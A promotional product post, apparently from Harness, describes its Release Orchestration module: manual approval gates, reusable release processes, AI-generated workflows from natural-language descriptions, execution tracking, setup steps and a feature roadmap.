Not everything can be automated. Security reviews, architectural approvals, and stakeholder sign-offs require human judgment. Release Orchestration treats manual activities as first-class citizens with the same visibility and dependency support as automated activities. Manual activities pause execution until someone provides input—an approval, verification, or checklist confirmation. Notifications alert the responsible person; they review the context and complete the activity, optionally leaving notes. Manual activities can depend on automated activities (approval after deployment) or vice versa (deployment after approval). All completions appear in audit trails and reports for compliance documentation.
Release Orchestration provides primitives—processes, phases, activities, dependencies, inputs—that compose to match how your organization ships software. Model microservice releases with parallel deployments and end-to-end tracking. Define compliance-driven releases with approval gates at critical checkpoints. Create streamlined hotfix workflows for emergencies. Coordinate feature flag enablement with deployments. Assign phase owners for multi-team coordination with notification-driven handoffs. The system scales from simple three-phase releases to complex workflows with fifty activities and nested subprocesses.
Harness AI transforms natural language descriptions into structured processes. Describe your workflow—"Create a multi-service release with phases for build, testing, deployment, and monitoring. Assign owners for Development, QA, and DevOps,"—and AI generates the complete structure with phases, activities, and dependencies. Refine the generated process by adding activities, adjusting dependencies, and configuring inputs. This reduces process modeling time from hours to minutes, making it practical to create specialized processes for different release types.
Release Orchestration provides real-time tracking at three levels: activity (running, succeeded, failed, waiting), phase (overall progress), and process (end-to-end status). The execution graph shows phases as nodes, dependencies as arrows, and color-coded status on each activity. Drill into pipeline executions from the release view with one click. See approval history for manual activities—who approved, when, and with what notes. This unified view eliminates the need to check multiple systems. Platform teams can see at a glance which releases are progressing smoothly, which are awaiting approval, and which need attention. [Learn more →](https://developer.harness.io/docs/release-orchestration/execution/activity-execution-flow)
Release Orchestration is available now in Harness. Contact Harness Support to enable the module for your account. Once enabled, explore Processes (model release blueprints), Release Calendar (schedule and track releases), Activity Store (reusable activities), and Input Store (configuration sets). The getting started guide walks you through creating your first AI-powered process, adding activities, and executing a release.
We're actively developing additional capabilities: deeper analytics and insights (release velocity metrics, phase duration trends, failure pattern analysis), advanced dependency modeling (cross-release dependencies, environment-level locking), enhanced collaboration (in-line comments, Slack-native monitoring), a template marketplace for common release patterns, and API/GitOps for managing processes as code. The roadmap prioritizes capabilities that help teams ship faster with greater confidence.
Software delivery has evolved far beyond single-service deployments, but release management tooling hasn't kept pace. Spreadsheets, email coordination, and manual checklists don't scale to modern microservice architectures, multi-team workflows, and compliance requirements. Release Orchestration provides the unified framework enterprise teams need to model, automate, and track complex releases across teams, tools, and environments.
Define reusable processes. Execute them with different inputs. Track activity-level progress. Enforce approvals and capture sign-offs. Maintain complete audit trails. All in one place, integrated with the pipelines and deployment workflows you already use.
Ready to see it in action? Explore the Release Orchestration documentation or reach out to your Harness account team to discuss how Release Orchestration can transform your release workflows.
The future of release management isn't about doing the same manual coordination faster—it's about orchestrating releases as structured, repeatable, auditable processes. That future is available today.
Need more info? Contact Sales